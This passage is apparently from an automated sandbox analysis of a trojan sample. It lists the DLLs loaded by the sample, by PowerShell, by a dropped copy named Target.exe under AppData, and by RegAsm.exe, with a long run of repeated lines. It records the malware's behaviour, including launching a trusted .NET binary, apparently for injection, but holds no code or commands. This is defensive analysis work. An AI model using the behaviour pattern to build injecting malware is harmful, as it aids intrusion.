                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxx.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: nvapi64.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeSection loaded: atiadlxy.dllJump to behavior
